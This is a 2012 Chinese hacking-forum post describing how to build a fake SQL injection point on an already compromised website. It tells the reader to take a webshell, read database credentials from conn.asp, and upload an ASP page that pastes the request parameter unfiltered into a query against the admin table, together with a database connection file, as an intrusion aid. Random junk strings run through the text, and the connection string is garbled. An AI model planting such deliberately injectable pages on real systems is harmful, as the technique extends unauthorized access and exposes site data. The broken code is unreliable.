中国网络渗透测试联盟
标题:
自己构造注入点方便入侵
[打印本页]
作者:
admin
时间:
2012-9-13 17:27
标题:
自己构造注入点方便入侵
自己构造注入点方便入侵
" N; B' i0 }" P) h
- F- U( j; j( ?' D) N! A ?
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
3 w& o3 y' Y7 j% b7 s+ W
! l* p5 r6 P! f6 ` D6 z: S" U% W+ `8 O
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
* J C1 b$ X; q& Y6 K% a4 y6 n
8 @ o: k9 g( F. Q4 `
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
% V& r$ k' b' x/ T' |/ T
( M: x+ O- p t; e# F* w, X
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
! s# O5 D; ^/ k* p2 }
* d: F4 T# E- U" \2 C! Q
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
6 k5 |2 K/ N+ L7 `) c# Z% f
: G3 N9 J+ s+ Z6 w" E, r2 n
程序代码
# I( M2 {: G4 d6 i. S5 n) y
<!--#include file="xx.asp"-->
- M+ i: w! B* ~* S2 w b1 ~
<%
- n9 x% p! g3 d& i3 b- f* p: O
set rs=server.createobject("ADODB.recordset")
7 O7 S# s4 X( `1 m; r- I
id = request("id")
' _6 \6 {' n- L1 X
strSQL = "select * from admin where id=" & id
9 U. e! C& Y g& E1 [" h5 d! J5 X; |
rs.open strSQL,conn,1,3
1 _. C& y: K8 r* N, {: o
rs.close
$ g' T; x5 Q6 N& ^
%>
% B( }4 {+ n# o. c. ~# ~5 K( ]
7 b; p4 |+ s) n$ F& @
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
8 U; ?. h0 H% U3 b S1 W$ R1 G* i
% F& r1 J' p- o
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
( d6 h, Q+ F8 ~6 @) n. H
( d1 K5 R: P) Y; N6 P
然后就要构造一个连接数据库的文件了,代码如下:
* C# X3 x; o6 N2 c+ g
程序代码
. q: A+ r( r! i" k3 d" N0 x6 K
<%
+ Z+ B/ K1 p6 d3 e" V4 T
strSQLServerName = "000.000.000.000" '服务器名称或地址
# v8 H. x- b& B/ I. a' J
strSQLDBUserName = "sqlname" '数据库帐号
. H" P$ y8 f* [0 s5 J
strSQLDBPassword = "sqlpass" '数据库密码
& z* C; Z! o: r0 Z' y" Y& g2 d
strSQLDBName = "sqldataname" '数据库名称
" `5 z6 M. r9 j$ |# O0 d6 h5 H s2 i' p' n
Set conn = Server.CreateObject("ADODB.Connection")
1 ?( P2 D4 B4 q9 m9 `
strCon = "
rovider=SQLOLEDB.1
ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "
assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
E7 C( S5 [% i6 [3 S
conn.open strCon
, A: g& v$ a* b2 i. V, y
%>
* o3 y9 v1 \0 d& d6 c1 w
6 m* g0 i4 A2 S, c+ H3 ~' W
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
* [3 I9 B5 \9 R' E' M, i! J7 h
6 `8 _: J0 y+ o2 Y6 X
就这样,正常情况下,就OK了,伪造成功……
3 S, U$ h+ u4 u8 b7 _1 x9 O
$ x( R' Y. O( s% M. w8 W6 u
如果有什么问题可以提出来大家一起探讨解决。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2